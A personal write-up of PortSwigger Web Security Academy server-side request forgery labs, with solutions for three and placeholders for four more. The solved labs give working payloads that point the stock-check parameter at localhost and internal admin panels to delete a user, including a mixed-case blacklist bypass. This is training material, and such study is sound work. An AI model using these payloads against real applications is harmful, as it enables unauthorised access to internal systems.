---
title: 'Server-Side Request Forgery (SSRF)'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# Basic SSRF against the local server

<https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab has a stock check feature which fetches data from an internal system.
>
>> To solve the lab, change the stock check URL to access the admin interface at `http://localhost/admin` and delete the user `carlos`.


## Solution

1. Use the stock checker function on a product page. The request body contains:

    ```
    stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
    ```

1. Send it to Repeater and change the value of `sockApi` to this:

    ```
	stockApi=http://localhost/admin/delete?username=carlos
    ```

1. Send the edited request




# Basic SSRF against another back-end system

<https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab has a stock check feature which fetches data from an internal system.
>
>> To solve the lab, use the stock check functionality to scan the internal `192.168.0.X` range for an admin interface on port 8080, then use it to delete the user `carlos`.


## Solution

1. Send a product stock check POST request to Intruder, and cycle through numbers 1 to 254 with the following body:

    ```
	stockApi=http://192.168.0.§1§:8080/admin
    ```

	In my case, the admin interface was at `.76`, revealed by the increased response length for that payload.

1. In Repeater, send this:

    ```
	stockApi=http://192.168.0.76:8080/admin/delete?username=carlos
    ```




# SSRF with blacklist-based input filter

<https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter>

Completed: 2022-12-16


## Summary

TKTK


## Objective

> This lab has a stock check feature which fetches data from an internal system.
>
>> To solve the lab, change the stock check URL to access the admin interface at `http://localhost/admin` and delete the user `carlos`.
>
> The developer has deployed two weak anti-SSRF defenses that you will need to bypass.


## Solution

1. The words "localhost" and "admin" are blacklisted and trigger the following:

    ```
	stockApi=http://localhost/admin
    ```
    
    > "External stock check blocked for security reasons"

1. Obfuscating localhost as 127.0.0.1 and other non-decimal representations doesn't work
1. Varying case within the blacklisted words bypasses the restrictions:

    ```
	stockApi=http://lOcAlHoSt/aDmIn/delete?username=carlos
    ```




# SSRF with whitelist-based input filter

<https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter>

Completed: TKTK




# SSRF with filter bypass via open redirection vulnerability

<https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection>

Completed: TKTK




# Blind SSRF with out-of-band detection

<https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection>

Completed: TKTK




# Blind SSRF with Shellshock exploitation

<https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation>

Completed: TKTK

